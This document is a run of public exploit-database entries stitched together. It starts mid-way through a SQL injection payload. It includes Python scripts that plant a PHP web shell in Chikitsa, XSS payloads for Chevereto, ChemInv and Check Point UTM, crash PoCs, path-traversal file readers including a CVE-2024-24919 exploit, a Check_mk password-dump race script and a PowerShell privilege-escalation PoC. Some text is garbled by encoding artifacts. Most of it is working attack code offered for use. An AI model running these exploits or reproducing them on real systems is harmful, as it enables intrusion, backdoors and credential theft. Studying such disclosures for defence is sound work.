Parameter: User-Agent (User-Agent)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)
Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND
8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION
SELECT 6426) END))-- -
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)
## Proof and Exploit:
[href](https://streamable.com/7x69yz)
## Time spent
`01:30:00`
## Writing an exploit
`00:05:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Chikitsa Patient Management System 2.0.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 03/12/2021
# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://sourceforge.net/u/dharashah/profile/
# Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download
# Version: 2.0.2
# Tested on: Ubuntu
import requests
import os
import argparse
def login(session , target , username , password):
print("[+] Attempting to login with the credential")
url = target + "/index.php/login/valid_signin"
login_data = {"username" : username , "password" : password}
session.post(url , data=login_data , verify=False)
return session
def generate_plugin():
print("[+] Generating a malicious plugin")
global tmp_dir
tmp_dir = os.popen("mktemp -d").read().rstrip()
open(f"{tmp_dir}/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>")
os.popen(f"cd {tmp_dir} && zip rce.zip rce.php").read()
def upload_plugin(session , target):
print("[+] Uploading the plugin into the server.")
url = target + "/index.php/module/upload_module/"
file = open(f"{tmp_dir}/rce.zip" , "rb").read()
session.post(url , verify=False ,files = {"extension" : ("rce.zip" , file)})
session.get(target + "/index.php/module/activate_module/rce" , verify=False)
print(f"[+] Backdoor Deployed at : {target}/application/modules/rce.php")
print(f"[+] Example Output : {requests.get(target +'/application/modules/rce.php?cmd=id' , verify=False).text}")
def main():
parser = argparse.ArgumentParser("""
__ _ __ _ __
_____/ /_ (_) /__(_) /__________ _
/ ___/ __ \/ / //_/ / __/ ___/ __ `/
/ /__/ / / / / ,< / / /_(__ ) /_/ /
\___/_/ /_/_/_/|_/_/\__/____/\__,_/
Chikitsa Patient Management System 2.0.2 Authenticated Plugin Upload Remote Code Execution :
POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter)
req_args = parser.add_argument_group('required arguments')
req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")
req_args.add_argument("-u" , "--username" , help="Username" , required=True)
req_args.add_argument("-p" , "--password" , help="password", required=True)
args = parser.parse_args()
target = args.URL
if target[-1] == "/":
target = target[:-1]
username = args.username
password = args.password
session = requests.session()
login(session , target , username , password)
generate_plugin()
upload_plugin(session , target)
if __name__ == "__main__":
main()
# Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)
# Date: 03/12/2021
# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://sourceforge.net/u/dharashah/profile/
# Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download
# Version: 2.0.2
# Tested on: Ubuntu
import requests
import os
from zipfile import ZipFile
import argparse
def login(session , target , username , password):
print("[+] Attempting to login with the credential")
url = target + "/index.php/login/valid_signin"
login_data = {"username" : username , "password" : password}
session.post(url , data=login_data , verify=False)
return session
def download_backup( session , target):
print("[+] Downloading the backup (This may take some time)")
url = target + "/index.php/settings/take_backup/"
backup_req = session.get(url , verify=False)
global tmp_dir
tmp_dir = os.popen("mktemp -d").read().rstrip()
open(tmp_dir + "/backup_raw.zip" , "wb").write(backup_req.content)
print(f"[+] Backup downloaded at {tmp_dir}/backup_raw.zip")
def modify_backup():
print("[+] Modifying the backup by injecting a backdoor.")
zf = ZipFile(f'{tmp_dir}/backup_raw.zip', 'r')
zf.extractall(tmp_dir)
zf.close()
open(tmp_dir + "/uploads/media/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>")
os.popen(f"cd {tmp_dir}/ && zip -r backup_modified.zip chikitsa-backup.sql prefix.txt uploads/").read()
def upload_backup(session , target):
print("[+] Uploading the backup back into the server.(This may take some time)")
url = target + "/index.php/settings/restore_backup"
file = open(f"{tmp_dir}/backup_modified.zip" , "rb").read()
session.post(url , verify=False ,files = {"backup" : ("backup-modified.zip" , file)})
print(f"[+] Backdoor Deployed at : {target}/uploads/restore_backup/uploads/media/rce.php")
print(f"[+] Example Output : {requests.get(target +'/uploads/restore_backup/uploads/media/rce.php?cmd=id' , verify=False).text}")
def main():
parser = argparse.ArgumentParser("""
__ _ __ _ __
_____/ /_ (_) /__(_) /__________ _
/ ___/ __ \/ / //_/ / __/ ___/ __ `/
/ /__/ / / / / ,< / / /_(__ ) /_/ /
\___/_/ /_/_/_/|_/_/\__/____/\__,_/
Chikitsa Patient Management System 2.0.2 Authenticated Remote Code Execution :
POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter)
req_args = parser.add_argument_group('required arguments')
req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")
req_args.add_argument("-u" , "--username" , help="Username" , required=True)
req_args.add_argument("-p" , "--password" , help="password", required=True)
args = parser.parse_args()
target = args.URL
if target[-1] == "/":
target = target[:-1]
username = args.username
password = args.password
session = requests.session()
login(session ,target , username , password)
download_backup(session , target )
modify_backup()
upload_backup(session , target)
if __name__ == "__main__":
main()
# Exploit Title: Chevereto 3.17.1 - Cross Site Scripting (Stored)
# Google Dork: "powered by chevereto"
# Date: 19.04.2021
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://chevereto.com/
# Software Link: https://chevereto.com/releases
# Version: 3.17.1
# Tested on: Windows 10 / Xampp
Proof of Concept:
1. Press the Upload image button and upload any image.
2. After uploading the image, press the pencil icon on the top right of the image and write "><svg/onload=alert(1)> instead of the title.
3. Upload the picture and go to the picture address.
source: https://www.securityfocus.com/bid/53448/info
Chevereto Image Upload Script is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
An attacker may leverage the information-disclosure issue to enumerate the existence of local files. Information obtained may aid in further attacks.
Chevereto Image Upload Script 1.91 is vulnerable; other versions may also be affected.
http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php
source: https://www.securityfocus.com/bid/53448/info
Chevereto Image Upload Script is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
An attacker may leverage the information-disclosure issue to enumerate the existence of local files. Information obtained may aid in further attacks.
Chevereto Image Upload Script 1.91 is vulnerable; other versions may also be affected.
http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php%00<script>alert(1);</script>
#!/usr/bin/python
### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ###
# Date: 2016-10-27
# PoC Author: n30m1nd
# Vendor Homepage: http://www.giuspen.com/cherrytree/
# Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe
# Version: Affects all versions of CherryTree prior to 0.37.6
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Thanks to Giusepe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Run this python script. It will generate a "PoC-1.ctd" file.
# * Open the file and hover over the link.
# Bonus
# =====
# It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...)
# Why?
# ====
# For what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer reference when
# trying to draw the contents of the graphical bitmaps.
# Exploit code
# ============
crashfile = '''<?xml version="1.0" ?>
<cherrytree>
<node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">
<rich_text link="node 1 '''+ "A"*65534 + '''">MOUSE OVER THIS</rich_text>
</node>
</cherrytree>
'''
with open("PoC-1.ctd", 'w') as f:
f.write(crashfile)
f.close()
# Exploit Title: Cherry Music v0.35.1 directory traversal vulnerability allows authenticated users to download arbitrary files
# Date: 11-09-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: http://www.fomori.org/cherrymusic/index.html
# Software Link: http://www.fomori.org/cherrymusic/versions/cherrymusic-0.35.1.tar.gz
# Version: 0.35.1
# Tested on: ubuntu 14.04 LTS
# CVE : CVE-2015-8309
import urllib2, cookielib, urllib
#set parameters here
username = 'admin'
password = 'Password01'
baseUrl = 'http://localhost:8080/'
targetFile = '/etc/passwd'
downloadFileName = 'result.zip'
####
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
params = urllib.urlencode({'username': username, 'password': password, 'login': 'login'})
req = urllib2.Request(baseUrl, params)
response = opener.open(req)
for c in cj:
if c.name == "session_id":
session_id = c.value
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders.append(('Cookie', 'session_id=' + session_id))
params = urllib.urlencode({'value': '["' + targetFile + '"]'})
request = urllib2.Request(baseUrl + "download", params)
response = opener.open(request).read()
with open(downloadFileName, 'wb') as zipFile:
zipFile.write(response)
Document Title:
===============
Chemtool 1.6.14 Memory Corruption Vulnerability
Date:
=============
08/02/2015
Vendor Homepage:
================
http://ruby.chemie.uni-freiburg.de/~martin/chemtool/
Abstract Advisory Information:
==============================
Memory Corruption Vulnerability on Chemtool 1.6.14.
Affected Product(s):
====================
Chemtool 1.6.14 or older
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A Memory Corruption Vulnerability is detected on Chemtool 1.6.14. An
attacker can crash the software by using an input file.
Also, an attacker can crash the software by entering a filename too long.
b77a8000-b77a9000 r--s 00000000 08:01 152558
/var/cache/fontconfig/3fe29f0c9fa221c8ee16555d4835b3ab-le32d4.cache-4
b77a9000-b77aa000 r--s 00000000 00:15 209651 /run/user/1000/dconf/user
b77aa000-b77bb000 r-xp 00000000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bb000-b77bc000 r--p 00010000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bc000-b77bd000 rw-p 00011000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bd000-b77be000 rwxp 00000000 00:00 0
b77be000-b77bf000 r--p 00855000 08:01 274691
/usr/lib/locale/locale-archive
b77bf000-b77c0000 r--p 00596000 08:01 274691
/usr/lib/locale/locale-archive
b77c0000-b77c2000 rw-p 00000000 00:00 0
b77c2000-b77c3000 r-xp 00000000 00:00 0 [vdso]
b77c3000-b77e3000 r-xp 00000000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
b77e3000-b77e4000 r--p 0001f000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
b77e4000-b77e5000 rw-p 00020000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
bfeff000-bff21000 rw-p 00000000 00:00 0 [stack]
Aborted (core dumped)
Proof of Concept (PoC):
=======================
This vulnerabilities can be exploited by local attackers with
userinteraction.
First test. Attacker can generate a malicious file (format .png).This file
can produced a Stack Smashing.
#/usr/bin/ruby
buf = "a"*3000
filename = "crash.png"
file = open(filename,'w')
file.write(buf)
file.close
puts "file created!"
Second test. Attacker can enter a filename too long. For example, this
program needs recieve a parameter. If this parameter is too long, It will
crash.
$chemtool $(perl -e 'print "A"x900')
How to perform:
=======================
1) You can test it with gdb. You attach this application.
2) Run it, now, you can move "crash.png" file that we generated by our ruby
script to the application. Also, you can run argv[1] with a long value.
When you perform above steps so application will crash. Analyze it on gdb.
Solution - Fix & Patch:
=======================
Restrict working maximum size. I believe that this bug doesn't have
solution.
Security Risk:
==============
The security risk of the vulnerability is estimated as medium because of
the local crash method.
Authors:
==================
Pablo González
# Exploit Title: ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting
# Exploit Author: Bobby Cooke
# Date: 2020-04-29
# Software Link: https://github.com/tmorrell/cheminv
# Software Info:
# "Cheminv is a web-based chemical inventory system. This responsive database provides an accessible way to organize and order chemicals, and is provided as an open-source package for all non-commercial users."
# "Cheminv was created by Thomas Morrell for the Haw Yang Lab at Princeton University"
# "Cheminv is based on ecDB www.ecDB.net, which was created by Nils Fredriksson aka. ElectricMan and designed by Buildlog."
# Version: 1
# Tested On: CentOS
# Vulnerability Type:
# ChemInv suffers from a persistent cross-site scripting vulnerability(XSS). This vulnerability can be exploited to have all users of the system, with read access to the project, execute malicious client-side code; every time the users views the 'Projects' or 'Add Chemicals' tab.
# The application's source code mitigates SQL injection (SQLi), but fails to sanitize HTML and JavaScript injections to the SQL database.
# Vulnerable Source Code
## proj_list.php
33 include('include/include_proj_add.php');
34 $AddProj = new ProjAdd;
35 $AddProj->AddProj();
36
37 $proj_query = mysql_query("SELECT * FROM projects WHERE project_owner= $owner");
## include/include_proj_add.php
2 class ProjAdd {
3 public function AddProj () {
4
5 require_once('include/login/auth.php');
6 include('include/mysql_connect.php');
7
8 if(isset($_POST['submit'])) {
9 $owner = $_SESSION['SESS_MEMBER_ID'];
10 $name = mysql_real_escape_string($_POST['name']);
11
12 if ($name == '') {
13 echo '<div class="message red">';
14 echo 'You have to specify a name!';
15 echo '</div>';
16 }
17 else {
18 $sql="INSERT into projects (project_owner, project_name) VALUES ('$owner', '$name')";
19 $sql_exec = mysql_query($sql);
# Malicious POST Request to https://TARGET/proj_list.php
POST /proj_list.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/proj_list.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
Connection: close
Cookie: PHPSESSID=7af5kg3to8fstfum0to1ukpb85
name=evilProject<script>alert('XSS');</script>&submit=
# Exploit Title: CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation
# Date: 2019-01-30
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: https://www.checkpoint.com/
# Version: Check Point Endpoint Security VPN <= E80.87 Build 986009514
# Version: Check Point ZoneAlarm <= 15.4.062.17802
# CVE: CVE-2019-8452
Description:
============
It is possible to change permissions of arbitrary file so that user have full control over it after exploitation which results in Local Privilege Escalation.
It was found that Check Point software (Endpoint Security Client and ZoneAlarm) uses tvDebug.log file stored in "C:\Windows\Internet Logs\tvDebug.log" or in ProgramData, for example "C:\ProgramData\CheckPoint\ZoneAlarm\Logs\tvDebug.log".
Over this log file all authenticated users have full control and it was found that Check Point service writes to it with SYSTEM privileges.
However this file could not be used for exploitaion as it is always used/taken by Check Point service so for example this is why users cannot delete it in normal conditions (unless service crashes and/or is restarted).
However it was noticed that when this log file reaches some limit (depending on software) then it is archived to the same location and name but with ZIP extension. The same permissions are set for this archive file so all authenticated users can access it.
Taking all of this into account we can create an attack scenario:
1. If tvDebug.zip file exists then delete it
2. Create hardlink (using CreateHardlink.exe) named tvDebug.zip which points to other file that we would like to have permissions to (this file must not be taken by other process when Check Point service tries to use it)
3. Fill tvDebug.log log file above the limit. For ZoneAlarm it is 50Mb, for VPN it is 20Mb. It can be done by using software as normal user.
4. Restart system as service needs to be restarted to make an archive.
5. Now your file has permissions changed and you have all access to it.
6. If we pointed to "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll" in step 2 then we can replace this DLL with custom one.
7. Click "VPN Options" in Client GUI and then close this windows. Closing "VPN Options" window forces LogonISReg.dll to be loaded with SYSTEM privileges.
Proof of Concept:
=================
# PoC written in PowerShell to fully exploit Check Point Endpoint Client. It can be used also to exploit ZoneAlarm.
# file that we want to have permissions to
# LogonISReg.dll is not used on startup and we can force to load it with SYSTEM privileges after exploitation
$file = "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll"
# path to symboliclink testing tools CreateHardlink.exe
# CreateHardlink.exe is a tool created by James Forshaw - https://github.com/googleprojectzero/symboliclink-testing-tools
$hardlink = "C:\Temp\CreateHardlink.exe"
Write-Host "[!] Detecting Check Point software."
if ([System.IO.File]::Exists("$env:windir\Internet Logs\tvDebug.log")) {
$logfile = "$env:windir\Internet Logs\tvDebug.zip"
Write-Host "[+] Check Point Endpoint Security found."
}
elseif ([System.IO.File]::Exists("$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.log")) {
$logfile = "$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.zip"
Write-Host "[+] Check Point ZoneAlarm found."
}
else {
Write-Host "[-] Check Point software was not found."
}
Write-Host "[!] Trying to delete tvDebug.zip file."
if ([System.IO.File]::Exists($logfile)) {
while ([System.IO.File]::Exists($logfile)) { Remove-Item -Force 朴ath $logfile -ErrorAction SilentlyContinue }
Write-Host "[+] Successfully deleted tvDebug.zip archive file."
}
else {
Write-Host "[+] tvDebug.zip archive file was not found."
}
Write-Host "[!] Creating hardlink to a file that we would like to change permissions."
Start-Process -FilePath "cmd.exe" -ArgumentList "/c $hardlink `"$logfile`" `"$file`""
while (!([System.IO.File]::Exists($logfile))) { Sleep 1 }
Write-Host "[+] Hardlink successfully created."
Write-Host "[!] 1. Fill log file up to the limit and restart computer."
Write-Host "[!] 2. Now when permissions are changed replace LogonISReg.dll with your custom DLL."
Write-Host "[!] 3. Click VPN Options in Client GUI and close this window to force DLL load."
1. ADVISORY INFORMATION
=======================
Product: Check_mk
Vendor URL: https://mathias-kettner.de/check_mk.html
Type: Race Condition [CWE-362]
Date found: 2017-09-21
Date published: 2017-10-18
CVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE: CVE-2017-14955
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Check_mk v1.2.8p25
Check_mk v1.2.8p25 Enterprise
older versions may be affected too.
4. INTRODUCTION
===============
Check_MK is comprehensive IT monitoring solution in the tradition of Nagios.
Check_MK is available as Raw Edition, which is 100% pure open source, and as
Enterprise Edition with a lot of additional features and professional support.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
Check_mk is vulnerable to an unauthenticated information disclosure through a
race condition during the authentication process when trying to authenticate
with a valid username and an invalid password.
On a failed login, the application calls the function save_users(), which
performs two os.rename operations on the files "contacts.mk.new" and
"users.mk.new" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):
[..]
# Check_MK's monitoring contacts
filename = root_dir + "contacts.mk.new"
out = create_user_file(filename, "w")
out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
out.close()
os.rename(filename, filename[:-4])
# Users with passwords for Multisite
filename = multisite_dir + "users.mk.new"
make_nagios_directory(multisite_dir)
out = create_user_file(filename, "w")
out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
out.write("multisite_users = \\\n%s\n" % pprint.pformat(users))
out.close()
os.rename(filename, filename[:-4])
[...]
When sending many concurrent authentication requests with an existing/valid
username, such as:
POST /check_mk/login.py HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
Content-Length: 772
Connection: close
Upgrade-Insecure-Requests: 1
---9519178121294961341040589727
Content-Disposition: form-data; name="filled_in"
login
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"
1
---9519178121294961341040589727
Content-Disposition: form-data; name="_origtarget"
index.py
---9519178121294961341040589727
Content-Disposition: form-data; name="_username"
omdadmin
---9519178121294961341040589727
Content-Disposition: form-data; name="_password"
welcome
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"
Login
---9519178121294961341040589727--
Then it could happen that one of both os.rename() calls references a non-
existing file, which has just been renamed by a previous thread. This causes the
Python script to fail and throw a crash report, which discloses a variety of
sensitive information, such as internal server paths, account details including
hashed passwords:
</pre></td></tr><tr class="data odd0"><td class="left">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',
'contactgroups': ['all'],
'disable_notifications': False,
'email': u'admin@example.com',
'enforce_pw_change': False,
'last_pw_change': 0,
'last_seen': 0.0,
'locked': False,
'num_failed': 0,
'pager': '',
'password': '$1$400000$13371337asdfasdf',
'roles': ['admin'],
'serial': 2},
A script to automatically exploit this vulnerability can be found on [0].
6. POC
======
#!/usr/bin/python
# Exploit Title: Check_mk <=3D v1.2.8p25 save_users() Race Condition
# Version: <=3D 1.2.8p25
# Date: 2017-10-18
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: https://www.rcesecurity.com
# Software Link: https://mathias-kettner.de/check_mk.html
# Tested on: 1.2.8p25
# CVE:=09=09 CVE-2017-14955
#
# Howto / Notes:
# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and
# below as described by CVE-2017-14955. You only need a valid username to
# dump all encrypted passwords and make sure to setup a local proxy to
# catch the dump. Happy brute forcing ;-)
import requests
import threading
try:
=09from requests.packages.urllib3.exceptions import InsecureRequestWarning
=09requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except:
=09pass
# Config Me
target_url =3D "https://localhost/check_mk/login.py"
target_username =3D "omdadmin"
proxies =3D {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080',
}
def make_session():
=09v =3D requests.post(target_url, verify=3DFalse, proxies=3Dproxies, files=
=3D{'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (No=
ne, 'index.py'), '_username': (None, target_username), '_password': (None, =
'random'), '_login': (None, 'Login')})
=09return v.content
NUM =3D 50
threads =3D []
for i in range(NUM):
t =3D threading.Thread(target=3Dmake_session)
threads.append(t)
t.start()
7. RISK
=======
To successfully exploit this vulnerability an unauthenticated attacker must only
have network-level access to the application.
The vulnerability allows remote attackers to trigger an exception, which
discloses a variety of sensitive internal information such as:
- Local server paths
- Usernames
- Passwords (hashed)
- and user directory-specific attributes (i.e. LDAP)
8. SOLUTION
===========
Update to 1.2.8p26.
9. REPORT TIMELINE
==================
2017-09-21: Discovery of the vulnerability
2017-09-21: Sent limited information to publicly listed email address
2017-09-21: Vendor responds and asks for details
2017-09-21: Full vulnerability details sent to vendor
2017-09-25: Vendor pushes fix to git
2017-10-01: MITRE assigns CVE-2017-14955
2017-10-16: Fix confirmed
2017-10-18: Public disclosure
10. REFERENCES
=============
[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/
[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955
# Exploit Title: Check Point ZoneAlarm Local Privilege Escalation
# Date: 1/16/19
# Exploit Author: Chris Anastasio
# Vendor Homepage: https://www.zonealarm.com/software/free-antivirus/
# Software Link: Vulnerable Versions included in repo
# Version:
ZoneAlarm Free Antivirus + Firewall version: 15.3.064.17729
Vsmon version: 15.3.58.17668
Driver version: 15.1.29.17237
Antivirus engine version: 8.8.1.110
Antivirus signature DAT file version: 1297458144
# Tested on: Windows 7/Windows 10
# Vendor Disclosure: https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk142952
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46189.zip
source: https://www.securityfocus.com/bid/50189/info
Check Point UTM-1 Edge and Safe are prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities
2. Multiple HTML-injection vulnerabilities
3. Multiple cross-site request forgery vulnerabilities
4. Multiple URI-redirection vulnerabilities
5. An information-disclosure vulnerability
An attacker may leverage these issues to access sensitive information, redirect an unsuspecting victim to an attacker-controlled site, or steal cookie-based authentication credentials, to perform unauthorized actions in the context of a user's session.
Versions prior to Check Point UTM-1 Edge and Safe 8.2.44 are vulnerable.
Tested on versions 7.5.48x, 8.1.46x and 8.2.2x.
1) The following demonstrate the reflective XSS flaws:-
a) The Ufp.html page is vulnerable to XSS via the url parameter
It works by submitting a malicious url parameter to the ufp.html page
http://www.example.com/pub/ufp.html?url=";><script>alert(1)</script>&mask=000&swpreview=1
This works with firmware versions 7.5.48x, 8.1.46x and 8.2.2x.
b) The login page is also vulnerable to an XSS via the malicious session cookie
It works by submitting a malicious session cookie to the login page
Cookie: session="><script>alert(1)</script>
c) An authenticated XSS exists within the diagnostics command
http://www.example.com/diag_command.html?sw__ver=blah1&swdata=blah2&sw__custom='";);alert(1);//
(this might need to be submitted twice)
2) The following demonstrate the persistent XSS flaws and XSRF flaws:-
a) The blocked URL warning page is vulnerable to a persistent XSS attack placing any internal users at risk of attack
when the page is displayed.
First an attacker has to trick the administrator to follow a XSRF attack; the (swsessioncookie) session cookie for
simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper).
http://www.example.com/UfpBlock.html?swcaller=UfpBlock.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&ufpblockhttps=0&ufpbreakframe=&backurl=WebRules.html&ufpblockterms=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Firewall users then visiting blocked sites will have the blocked page displayed and the attack carried out.
http://www.example.com/pub/ufp.html?url=www.blockedUrl.com&mask=000&swpreview=1
b) The Wi-Fi hotspot landing page on Wi-Fi enabled firewalls is also vulnerable, with any user using the Wi-Fi access
point being at risk.
First an attacker has to trick the administrator to follow a XSRF attack, the (swsessioncookie) session cookie for
simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper).
http://www.example.com/HotSpot.html?swcaller=HotSpot.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&hotspotnets=00000000000000000000000000000000000000&hotspotpass=1&hotspotmulti=1&hotspothttps=0&hotspotnet1=0&hotspotnet2=0&hotspotnet3=0&hotspotenf=0&hotspottitle=Welcome+to+My+HotSpot&hotspotterms=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&thotspotpass=on&thotspotmulti=on
Firewall users then visiting the Wi-Fi landing page will then have the attack carried out.
http://www.example.com/pub/hotspot.html?swpreview=1
3) The following demonstrate the (authenticated) offsite redirection flaws:-
a) Enter the following URL to redirect
http://www.example.com/12?swcaller=http://www.procheckup.com
b) Enter the following URL and then press back button.
http://www.example.com/UfpBlock.html?backurl=http://www.procheckup.com
4) The following demonstrate the Information disclosure flaws (no authentication needed)
It was found that the /pub/test.html program disclosed information, regarding the patch level used, licensing and the
MAC addresses to unauthenticated users.
a) On early firmware versions 5.0.82x, 6.0.72x & 7.0.27x 7.5.48x
Just requesting http:// www.example.com/pub/test.html is sufficient
b) However this no longer worked on versions 8.1.46x & 8.2.26x however adding the URL parameter and a double quote
bypassed this check
https:// www.example.com/pub/test.html?url="
# Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336
# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20
# CVE : CVE-2024-24919
from requests import Request, Session
import sys
import json
def title():
print('''
_______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| || | |__ \| || | / _ \/_ |/ _ \
| | \ \ / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |
| | \ \/ / | __|______/ /| | | |/ /|__ _|______/ /|__ _\__, || |\__, |
| |____ \ / | |____ / /_| |_| / /_ | | / /_ | | / / | | / /
\_____| \/ |______| |____|\___/____| |_| |____| |_| /_/ |_| /_/
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
''')
def exploit(url, path):
url = url + '/clients/MyCRL'
data = "aCSHELL/../../../../../../../../../../.."+ path
headers = {
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'
}
s = Session()
req = Request('POST', url, data=data, headers=headers)
prepped = req.prepare()
#del prepped.headers['Content-Type']
resp = s.send(prepped,
verify=False,
timeout=15
)
print(prepped.headers)
print(url)
print(resp.headers)
print(resp.status_code)
